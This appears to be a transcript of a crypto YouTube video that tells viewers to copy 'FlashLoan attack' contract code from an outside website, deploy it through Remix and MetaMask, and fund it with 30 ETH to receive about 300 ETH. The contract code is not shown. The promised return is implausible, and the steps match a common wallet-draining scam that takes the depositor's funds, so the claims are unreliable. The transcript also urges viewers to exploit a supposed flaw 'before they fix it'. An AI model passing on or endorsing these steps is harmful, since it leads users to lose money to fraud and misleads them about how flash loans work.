Hello everyone, Crypto University here. As usual, I will share some good method for you guys. Today I'll teach you how to get Ethereum using FlashLoan attack. First, open flashloanmix.com. You will see 3 methods there. Click on Ethereum to get FlashLoan attack source code. Open Remix Ethereum and click menu number 2 or Solidity Compiler menu. On compiler, select 0.5.0 version. Go back to FlashLoan Mix. On navigation menu, click menu number 5 and copy Ethereum FlashLoan attack source code. Then go back to Remix Ethereum. Click menu number 1 or Solidity file menu and create new file. Input FlashLoan.sol and paste Ethereum FlashLoan attack source code. Open Solidity Compiler menu or menu number 2, then click Compile FlashLoan.sol. Wait until its success. Open Deploy and Run Transaction menu or menu number 3. On Environment, change the value to Injected Web3. If this is your first time using methods like this, there will be confirmation. Accept that config. Automation. Click Deploy. On token name, input Flash Loan ETH. On token symbol, input FLE and input loan amount. Next, click Transact and click Confirm on your MetaMask wallet. Wait for a moment after transaction success. Copy your contract address that you made, and then on MetaMask wallet input liquidity amount, since the maximum loan amount is 10. If you input 100, it still count as max amount, which is 10. It means 10 loan amount times 30 liquidity amount. You will get around 300 Ethereum. Wait until the transaction complete, and click Action to do Ethereum FlashLoan attack, and click Confirm on your MetaMask wallet. Wait for a while until the contract finish, and then check your MetaMask wallet. Congratulations, with only 30 Ethereum, you can get around 300 Ethereum. This is good method that you need to try before they fix it. Don't forget to like, share, and subscribe. And don't forget to turn on notification for our channel. Please check our video about BNB Flash Loan at ACK on link description below. Have fun and have a good day.